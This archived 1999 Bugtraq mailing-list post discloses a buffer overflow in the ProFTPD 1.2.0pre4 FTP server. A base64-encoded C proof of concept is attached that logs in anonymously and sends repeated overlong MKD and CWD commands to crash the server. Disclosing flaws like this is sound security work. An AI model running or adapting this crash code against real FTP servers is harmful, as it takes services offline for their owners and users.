linux, säkerhet

4288098 1999-09-08  13:37  /119 rader/ Postmaster
Mottagare: Bugtraq (import) <7683>
Ärende: [linux-security] buffer overflow in proftpd-1.2.0pre4 
------------------------------------------------------------
             supposed to be 'safe' (fwd)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@securityfocus.com
X-Sender: jpv@jp-gp.vsi.nl
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED 
             BOUNDARY="-1463810815-1223308169-936489982=:15281"
Content-ID: <Pine.LNX.4.10.9909050208002.15329@prof.fr.nessus.org>
Message-ID:  <Pine.LNX.4.05.9909051345390.8090-200000@jp-gp.vsi.nl>
Date:         Sun, 5 Sep 1999 13:45:56 +0200
Reply-To: Jan-Philip Velders <jpv@JVELDERS.TN.TUDELFT.NL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Jan-Philip Velders <jpv@JVELDERS.TN.TUDELFT.NL>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.10.9909050208003.15329@prof.fr.nessus.org>

---------- Forwarded message ----------
Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST)
From: Renaud Deraison <deraison@cvs.nessus.org>
To: linux-security@redhat.com
Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4,
     supposed to be 'safe'
Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000
Resent-From: linux-security@redhat.com
Resent-cc: recipient list not shown: ;




Hello,

ProFTPd, a FTP server, has been suffering several security holes lately.

However, the version 1.2.0pre4 is still vulnerable to a mkdir attack,
even though it is supposed to be patched against it.

The trick is to create directories whose name don't exceed 255 chars.

I have not looked at this problem in detail, but I could at least make a
pointer point on a bogus location (85858585) using this method.

Attached to this mail is a C program that will make proftpd crash, but
which won't exploit the vulnerability.


Thank you for your attention,

				-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org


---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="crash_ftpd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9909050206220.15281@prof.fr.nessus.org>
Content-Description: demo code
Content-Disposition: ATTACHMENT; FILENAME="crash_ftpd.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j
bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU
UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog
Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz
dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0
aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy
aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk
IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog
Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2
cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg
IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l
IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K
IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz
b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD
V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy
ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt
a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h
bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0
KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6
ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu
X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0
YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j
a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog
ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg
c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy
NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz
cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1
NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl
Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw
XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j
LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo
c29jLCAiUEFTUyBwYXNzQFxyXG4iLCBzdHJsZW4oIlBBU1MgcGFzc0Bcclxu
IiksMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBiemVybyhi
dWYsMTAyNCk7DQogIHNlbmQoc29jLCB3cml0ZWFibGVfZGlyLCBzdHJsZW4o
d3JpdGVhYmxlX2RpciksIDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAw
KTsNCiAgYnplcm8oYnVmLDEwMjQpOw0KICANCiAgDQogIGZvcihpPTA7aTw0
MDtpKyspDQogIHsNCiAgIHNlbmQoc29jLCBta2QsIHN0cmxlbihta2QpLCAw
KTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7DQogICBpZighc3RybGVu
KGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1vdGUgRlRQZCBjcmFzaGVk
IChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsNCiAgICBleGl0KDApOw0K
ICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAgIHNlbmQoc29jLCBjd2Qs
IHN0cmxlbihjd2QpLCAwKTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7
DQogICBpZighc3RybGVuKGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1v
dGUgRlRQZCBjcmFzaGVkIChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsN
CiAgICBleGl0KDApOw0KICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAg
fQ0KICBwcmludGYoIllvdSB3ZXJlIG5vdCB2dWxuZXJhYmxlIGFmdGVyIGFs
bC4gU29ycnlcbiIpOw0KICBjbG9zZShzb2MpOw0KIH0NCiBlbHNlIHBlcnJv
cigiY29ubmVjdCAiKTsNCiByZXR1cm4oMCk7DQp9DQogICANCiAgDQo=
---1463810815-1223308169-936489982=:15281--
(4288098) -----------------------------------